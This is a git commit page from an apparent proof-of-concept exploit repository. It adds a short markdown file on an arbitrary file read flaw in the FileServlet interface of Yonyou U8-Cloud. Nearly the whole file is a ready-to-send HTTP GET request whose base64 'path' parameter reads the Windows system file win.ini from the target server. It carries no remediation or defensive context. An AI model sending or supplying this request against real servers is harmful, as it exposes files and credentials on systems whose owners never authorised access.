admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create 用友U8-Cloud接口FileServlet存在任意文件读取漏洞.md

Browse Source
This commit is contained in:
wy876 2024-03-28 19:23:42 +08:00 committed by GitHub
parent adde1f9304
commit 0a2c127708
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 9 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
用友U8-Cloud接口FileServlet存在任意文件读取漏洞.md Normal file
View File

@ -0,0 +1,9 @@
## 用友U8-Cloud接口FileServlet存在任意文件读取漏洞
## poc
```
GET /service/~hrpub/nc.bs.hr.tools.trans.FileServlet?path=QzovL3dpbmRvd3Mvd2luLmluaQ== HTTP/1.1
Host: url
```